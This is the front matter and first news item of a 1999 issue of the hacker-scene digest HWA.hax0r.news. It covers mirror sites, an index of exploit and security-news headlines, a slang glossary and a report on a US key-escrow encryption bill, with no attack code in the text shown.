Copy Link
Add to Bookmark
Report
hwa-hn30
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 30 Volume 1 1999 Aug 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
New mirror sites
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #30
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #30
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Key Escrow bill up for vote again................................
04.0 .. The lost art of IRC warfare using eggdrop bots...................
05.0 .. Finally a working redhat 5.2 local exploit - From BlackBox issue #1
06.0 .. The State of Crypto today........................................
07.0 .. Using a backdoor in a firewalled system..........................
08.0 .. PacketStorm Security Sells Out?..................................
09.0 .. CryptoGram Aug 15th '99..........................................
10.0 .. TELNET.EXE HEAP OVERFLOW.........................................
11.0 .. SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE....................
12.0 .. THE MUSIC INDUSTRIES' "CYBER-SHERRIF"............................
13.0 .. ReDaTtAcK CHARGED ANYWAYS........................................
14.0 .. NA/MCAFEE RELEASES NEW VIRUS SERVICE.............................
15.0 .. TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET...........
16.0 .. E-COMMERCE AND PRIVACY...........................................
17.0 .. IDENTITY-THEFT...................................................
18.0 .. Y2K-THE MOVIE....................................................
19.0 .. 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES.........................
20.0 .. Y2K PROBLEMS.....................................................
21.0 .. GISB WILL USE PGP................................................
22.0 .. SURF ANONYMOUS FOR $5............................................
23.0 .. HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER............
24.0 .. PROJECTGAMMA BACK ONLINE.........................................
25.0 .. DETECTING INTRUDERS IN LINUX.....................................
26.0 .. WIRELESS CRIME-FIGHTING..........................................
27.0 .. 15-YEAR-OLD ADMITS HACKING INTO TCS..............................
28.0 .. JAPAN CLEARS WIRETAP BILL........................................
29.0 .. Warez Groups Hit With Racketeering Charges ......................
30.0 .. Public UK Sites Susceptible to Attack ...........................
31.0 .. Mitnick Prosecutor Moving to Private Practice ...................
32.0 .. NIPC Head Talks About FidNet ....................................
33.0 .. Spoofing revisited (w00w00)......................................
34.0 .. 2 Swedish men charged with hacking U.S computers.................
35.0 .. Feds delay network...............................................
36.0 .. The Effects of War on the Yugoslavian Network ...................
37.0 .. Survey Finds Internet Full of Holes .............................
38.0 .. Hacking Into an IT Career........................................
39.0 .. SETI@Home, Largest Computation Ever .............................
40.0 .. Hong Kong Blondes Labeled a Fraud ...............................
41.0 .. Peace Prize Winner Warns of Cyber War ...........................
42.0 .. Mitnick Still Denied Kosher Food ................................
43.0 .. Cable Pirates Busted ............................................
44.0 .. CSIS Admits Web Defacement ......................................
45.0 .. Win32.Kriz Set To Go Off Christmas Day ..........................
46.0 .. MS Windows Media Audio Broke One Day After Release ..............
47.0 .. Available Soon, Freedom! ........................................
48.0 .. AOL hacking IM users?............................................
49.0 .. Anti-gay site is hacked..........................................
50.0 .. Indonesian CyberWar? Or Not? ....................................
51.0 .. Gov Wants to Break Into to Personal Computers, Legally ,,,,,,,,,,
52.0 .. Hearings to be Held on Echelon ..................................
53.0 .. AOL Password Scam Uncovered .....................................
54.0 .. Bronc's Defcon VII Review .......................................
55.0 .. Y2K Survival Catalog ............................................
56.0 .. BELGIAN BANK COMPROMISED.........................................
57.0 .. CARDING IN NEWCASTLE.............................................
58.0 .. U.S.-British Cyber-Spy System Puts European Countries on Edge....
59.0 .. Watching the digital detectives..................................
60.0 ,, Microsoft acknowledges software glitch that exposes e-mail passwords
61,0 .. U.S to seek new computer surveillance power......................
62.0 .. Code cracker worries cryptographers..............................
63.0 .. AntiOnline offers infosec website hosting........................
64.0 .. PKI yesterday, today and tomorrow................................
65.0 .. Microsoft Advisory, double byte code page vulnerability..........
66.0 .. RHSA denial of service attack in in.telnetd......................
67.0 .. [EuroHaCk] stealth-code..........................................
68.0 .. RHSA; buffer overflow in libtermcap tgetent()....................
69.0 .. Possible AOL IM buffer overflow..................................
70.0 .. L0pht security advisory:Attackers can remotely add default route entries
71.0 .. Setuid bug in Oracle ............................................
72.0 .. Vulnerability In LSA on Windows NT SP5...........................
73.0 .. w00w00's efnet ircd advisory (exploit included)..................
74.0 .. hiperbomb.c - reboot a hiperarc router...........................
75.0 .. HP Security Bulletins Digest.....................................
76.0 .. cfingerd exploit..................................................
77.0 .. Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding"
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix
Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
& Kevin Mitnick (Happy Birthday)
kewl sites:
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(No mail worthy of posting here this issue,)
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Issue #30... no comments this issue ...
*
*
*
*
*
* send submissions to: hwa@press.usmc.net
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 Key-Escrow on the Move - Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.hackernews.com/
contributed by evilwench
They aren't giving up. The Cyberspace Electronic
Security Act is currently being drafted by the Clinton
administration. In this latest bill, the administration
proposes that law enforcement agents have access to
decryption keys held by recovery agents. The proposed
law also allows the government to obtain search
warrants to find decryption keys if they are not held by
recovery agents. (Maybe the feeling is that if they keep
submitting new bills, one of them, eventually, will get
through. Unfortunately they are probably correct.)
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html
AUGUST 16, 1999
Bill reopens encryption access debate
BY DOUG BROWN (dbrown@fcw.com)
AND L. SCOTT TILLETT (scott_tillett@fcw.com)
Renewing efforts to allow law enforcement agencies to access and read
suspected criminals' encrypted electronic files, the Clinton administration has
drafted a bill that would give those agencies access to the electronic "keys"
held by third parties.
The Cyberspace Electronic Security Act, the drafting of which is being led by
the Office and Management and Budget and the Justice Department, "updates
law enforcement and privacy rules for our emerging world of widespread
cryptography," according to an analysis accompanying the bill obtained by
Federal Computer Week.
Encryption technology, according to the draft, is "an important tool for
protecting the privacy of legitimate communications and stored data" but also
has been used "to facilitate and hide unlawful activity by terrorists, drug
traffickers, child pornographers and other criminals." The new bill seeks to
uncover that activity by allowing law enforcement officials to obtain the keys
needed to decrypt messages by applying for search warrants or court orders,
much as they might do to uncover other evidence.
The administration is concerned about the use of encryption technology
because advances in recent years have made it extremely difficult for law
enforcement officials to crack a code once they have intercepted a message.
The draft bill is the Clinton administration's latest effort to push for legislation
that would make it easier for law enforcement agencies to intercept messages
or data that they think would be helpful in criminal investigations.
In 1993 the administration introduced the Clipper Chip, a hardware-based
encryption device designed to protect private communications but that would
provide a "backdoor" for law enforcement officials to decrypt necessary data.
The Clipper effort died after privacy groups and industry warned that law
enforcement agencies could abuse the power.
"All this is the Clipper Chip revisited in a different flavor but not as effective,"
said Michael Anderson, president of computer forensics firm New
Technologies Inc.
The administration also has blocked the export of certain advanced encryption
technology that would defeat efforts to conduct digital wiretaps as part of its
fight against international drug cartels and terrorists. But the software industry
continues to fight for the lifting of export restrictions.
